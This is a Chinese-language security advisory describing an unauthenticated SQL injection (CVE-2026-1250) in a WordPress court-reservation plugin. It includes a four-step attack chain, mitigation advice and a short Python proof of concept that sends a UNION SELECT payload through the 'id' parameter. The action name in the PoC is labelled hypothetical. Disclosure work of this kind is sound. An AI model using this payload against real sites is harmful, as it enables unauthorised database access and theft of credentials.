CVE-2026-1250 CVSS 7.5 高危

CVE-2026-1250 WordPress Court Reservation插件SQL注入漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1250

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Court Reservation – Manage Your Court Bookings Online

漏洞概述

WordPress插件“Court Reservation – Manage Your Court Bookings Online”在1.10.11及之前版本中存在高危SQL注入漏洞。该漏洞源于插件对用户提供的‘id’参数缺乏充分的转义处理，且未对现有SQL查询进行充分的准备。未经身份认证的远程攻击者可利用此漏洞，通过构造恶意请求向现有查询追加额外的SQL语句，从而从数据库中提取敏感信息，造成数据泄露。

技术细节

该漏洞属于典型的SQL注入漏洞，其根本原因在于应用程序未对用户输入进行严格的过滤和转义，直接将其拼接到SQL查询语句中。在受影响的插件版本中，处理‘id’参数的代码逻辑存在缺陷，允许攻击者注入恶意的SQL语法。根据CVSS向量分析，该漏洞攻击复杂度低（AC:L），无需任何权限（PR:N）且无需用户交互（UI:N），攻击者可通过网络直接发起攻击。利用此漏洞，攻击者可以使用UNION SELECT查询来提取数据库表结构、管理员密码哈希或其他敏感数据。由于漏洞存在于公共页面逻辑中，攻击无需登录即可进行，极大地增加了被自动化攻击工具利用的风险，严重威胁网站的数据安全性。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描并识别目标网站是否安装了受影响版本的Court Reservation插件。

STEP 2

2. 构造Payload

攻击者针对‘id’参数构造含有SQL注入代码的恶意HTTP请求（如UNION SELECT语句）。

STEP 3

3. 发起攻击

攻击者向目标服务器发送特制的请求，由于参数未经过滤，恶意代码被数据库引擎执行。

STEP 4

4. 数据窃取

服务器返回包含敏感数据（如用户凭证、配置信息）的响应，攻击者解析并利用这些数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-1250
import requests

def check_sqli(url):
    # Target endpoint (example, actual endpoint may vary based on plugin routing)
    target = f"{url}/wp-admin/admin-ajax.php"
    
    # Payload attempting to extract database version
    # Vulnerable parameter: 'id'
    params = {
        "action": "court_res_action", # Hypothetical action name
        "id": "1 UNION SELECT 1, version(), 3-- -"
    }
    
    try:
        response = requests.get(target, params=params, timeout=10)
        # Analyze response for SQL errors or version strings
        if "syntax error" in response.text or "mysql" in response.text.lower():
            print(f"[+] Potential SQL Injection found at {url}")
            print(f"[+] Response snippet: {response.text[:200]}")
        else:
            print("[-] No obvious vulnerability detected.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target_site = "http://example.com"
    check_sqli(target_site)

影响范围

Court Reservation – Manage Your Court Bookings Online <= 1.10.11

防御指南

临时缓解措施

如果无法立即更新插件，建议暂时禁用该插件功能以阻断攻击路径。同时，管理员应检查数据库日志以确认是否已被入侵，并强制重置所有用户密码，特别是管理员账户。在服务器层面，应限制数据库账户的访问权限，遵循最小权限原则。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表